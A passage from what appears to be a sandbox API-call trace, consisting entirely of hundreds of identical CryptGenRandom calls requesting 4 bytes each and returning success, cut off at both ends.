hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.582] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.583] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.586] CryptGenRandom 